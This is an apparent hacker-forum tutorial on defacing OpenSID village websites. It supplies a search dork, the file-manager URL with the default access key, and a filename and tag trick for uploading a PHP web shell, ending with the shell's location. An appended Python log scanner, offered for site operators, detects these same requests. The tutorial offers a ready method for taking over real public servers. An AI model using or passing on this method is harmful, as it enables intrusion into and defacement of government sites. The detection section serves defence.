Tutorial Deface 2021 OpenSID Responsive File Manager - Shell Upload

Hello Brother!


Baaa

OK, let's get straight to it.

Dork: "OpenSID <region name>"
Example: "OpenSID Sarkem"
Exploit : /assets/filemanager/dialog.php?akey=GantiKunciDesa

- Burp Suite
- Mozilla Firefox / Chrome




Uploading the shell directly doesn't work, bro.




Earlier I used the method of injecting PHP source into an image,
and it still failed, ugh! Injecting the file name also failed :v
No idea why.





Solved: I added an <html> tag above <?php
and changed the filename to shell.php<?.txt
It then gets uploaded as PHP.

Shell access?

localhost/desa/upload/media/shell.php

That's all, thanks.

-crusher.
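
For site operators, the requests described in this post leave recognizable traces in the web server access log. The following detection sketch is an added example, not part of the original post: it assumes the Apache/nginx "combined" log format, the function names and the `upload.php` path are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Values quoted in the post above.
DEFAULT_AKEY = "GantiKunciDesa"
FILEMANAGER = "/assets/filemanager/"
UPLOAD_DIR = "/upload/media/"
# Assumption: server-side script extensions worth flagging in an upload directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Assumption: Apache/nginx "combined" access-log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return the finding labels for one access-log line (empty list if clean)."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    findings = []
    if FILEMANAGER in url.path:
        # The file manager is reachable with the unchanged placeholder key.
        if DEFAULT_AKEY in parse_qs(url.query).get("akey", []):
            findings.append("default-akey")
        if m["method"] == "POST":
            findings.append("filemanager-post")
    # A script extension served from the upload directory should never occur.
    if UPLOAD_DIR in url.path and SCRIPT_EXT.search(url.path):
        findings.append("script-in-upload-dir:" + m["status"])
    return findings

def scan(lines):
    """Map each client IP to the sorted list of findings seen for it."""
    hits = {}
    for line in lines:
        m = LOG_LINE.match(line)
        for label in classify(line):
            hits.setdefault(m["ip"], set()).add(label)
    return {ip: sorted(labels) for ip, labels in hits.items()}

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Mar/2021:10:00:01 +0700] "GET /desa/assets/filemanager/dialog.php?akey=GantiKunciDesa HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Mar/2021:10:00:09 +0700] "POST /desa/assets/filemanager/upload.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Mar/2021:10:00:15 +0700] "GET /desa/upload/media/shell.php HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Mar/2021:10:01:00 +0700] "GET /desa/upload/media/foto.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, labels in scan(SAMPLE).items():
        print(ip, labels)
```

A `default-akey` hit means the site still accepts the placeholder key, which should be replaced with a unique secret. A `script-in-upload-dir` hit with status 200 warrants checking that the web server does not execute scripts from the upload directory.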